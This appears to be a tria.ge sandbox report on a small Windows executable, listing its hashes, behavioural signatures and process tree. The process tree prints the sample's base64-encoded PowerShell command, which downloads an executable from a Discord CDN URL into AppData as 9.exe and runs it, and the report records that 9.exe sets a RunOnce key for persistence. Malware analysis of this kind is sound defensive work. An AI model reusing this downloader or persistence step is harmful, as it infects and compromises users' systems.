Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
125s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
31/01/2023, 08:11
Static task
static1
Behavioral task
behavioral1
Sample
c7dd78efea30251ec8a5dc9d5ff5ba92dae3771fb4c9cfb0f44a23bdabcaad52.exe
Resource
win10v2004-20220812-en
General
-
Target
c7dd78efea30251ec8a5dc9d5ff5ba92dae3771fb4c9cfb0f44a23bdabcaad52.exe
-
Size
6KB
-
MD5
771d211ebe7494a139f2b76fbe7c3704
-
SHA1
ce312d13a9962bc458d7dbd226ec30c002b1eaba
-
SHA256
c7dd78efea30251ec8a5dc9d5ff5ba92dae3771fb4c9cfb0f44a23bdabcaad52
-
SHA512
9ecbbe1f39549dc8b9c33e1cdd1d1de1629dac5fe0911199490b31acac416b7ebf930f6a84abc6bc0f8bb6b09169aaf2ea4cd6515358943807bb125ac93366cb
-
SSDEEP
96:tw79nOCF/dd7tBfvk+F6AYxsOvk+FUnUvfd3ojqrl:tW9ndFld77vkAYdvkzMfdd
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 98 1780 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4140 9.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation c7dd78efea30251ec8a5dc9d5ff5ba92dae3771fb4c9cfb0f44a23bdabcaad52.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe" 9.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1780 powershell.exe 1780 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1780 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 3676 wrote to memory of 1780 3676 c7dd78efea30251ec8a5dc9d5ff5ba92dae3771fb4c9cfb0f44a23bdabcaad52.exe 81 PID 3676 wrote to memory of 1780 3676 c7dd78efea30251ec8a5dc9d5ff5ba92dae3771fb4c9cfb0f44a23bdabcaad52.exe 81 PID 1780 wrote to memory of 4140 1780 powershell.exe 92 PID 1780 wrote to memory of 4140 1780 powershell.exe 92 PID 1780 wrote to memory of 4140 1780 powershell.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\c7dd78efea30251ec8a5dc9d5ff5ba92dae3771fb4c9cfb0f44a23bdabcaad52.exe"C:\Users\Admin\AppData\Local\Temp\c7dd78efea30251ec8a5dc9d5ff5ba92dae3771fb4c9cfb0f44a23bdabcaad52.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADkANgA4ADUANwA5ADQANgAxADMAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGUAawB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABjAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB1AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOQAuAGUAeABlACcAKQApADwAIwB2AHoAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGsAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZAByAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOQAuAGUAeABlACcAKQA8ACMAcQBnAGIAIwA+AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Users\Admin\AppData\Roaming\9.exe"C:\Users\Admin\AppData\Roaming\9.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4140
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.2MB
MD5b60e44033994d1fde9a4b6f1338bfa04
SHA17f2cd8091276040ca011174269112099ec3e9bef
SHA256baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e
SHA512a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574
-
Filesize
4.2MB
MD5b60e44033994d1fde9a4b6f1338bfa04
SHA17f2cd8091276040ca011174269112099ec3e9bef
SHA256baaa098832eb5790a1fabfdc6284eecffdd74a914ea1312c0f413cc5bb814a7e
SHA512a8776d7ce2bffa25cefe789bf8f5a4b5b0b81ef53cd0c783ded1be9ee0f976c6c2a3bd41a4d9c05eb15910051d3cfe490c6390b7029d370ad71487c88416c574